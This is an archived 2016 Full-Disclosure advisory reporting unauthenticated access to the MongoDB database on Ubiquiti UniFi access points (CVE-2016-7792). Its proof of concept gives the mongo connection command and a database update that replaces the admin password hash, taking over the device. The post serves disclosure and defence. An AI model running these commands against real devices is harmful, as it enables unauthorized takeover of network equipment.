lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <595767868.209491.1475228966431.JavaMail.zimbra@prosec-networks.com>
Date: Fri, 30 Sep 2016 11:49:26 +0200 (CEST)
From: Tim Schughart <t.schughart@...sec-networks.com>
To: fulldisclosure@...lists.org, bugtraq@...urityfocus.com, 
 webappsec@...urityfocus.com
Cc: "Khanh Quoc. Pham" <k.pham@...sec-networks.com>
Subject: [FD] Critical Vulnerability in Ubiquiti UniFi

Hello @all, 

together with my colleague we found two uncritical vulnerabilities you'll find below.

Product: UniFi AP AC Lite
Vendor: Ubiquiti Networks Inc. 

Internal reference: ? (Bug ID)
Vulnerability type: Incorrect access control 
Vulnerable version: Unify 5.2.7 and possible other versions affected (not tested)
Vulnerable component: Database
Report confidence: yes
Solution status: Not fixed by Vendor, the bug is a feature. 
Fixed versions: -
Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec Networks
Solution date: - 
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7792
CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 


Vulnerability Details:
You are able to connect to the access points database, because of an broken authentication (OWASP TOP10). So you are able to modify the database and read the data. An possible scenario you'll find in PoC section. 

Risk:
An attacker gets access to the database and for e.g. is able to change the admins password, like you see in PoC below. 

PoC: 
 1. Generate SHA512 Hash with e.g.
 mkpasswd -m sha-512

 2. Connect via network to database, e.g. :
 mongo --port 27117 --host target_ip

 3. Change password via command
 "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow":
 "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"
 4. Login via web interface with new password


Best regards / Mit freundlichen Grüßen 


Tim Schughart 
CEO / Geschäftsführer  

--
ProSec Networks e.K. 
Ellingshohl 82  
56077 Koblenz 

Website: https://www.prosec-networks.com 
E-Mail: t.schughart@...sec.networks.com 
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90   

"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. If you are not the intended recipient and have received this email communication in error, please notify the sender immediately, delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, HRA 21625.“

"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht Koblenz, HRA 21625."

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ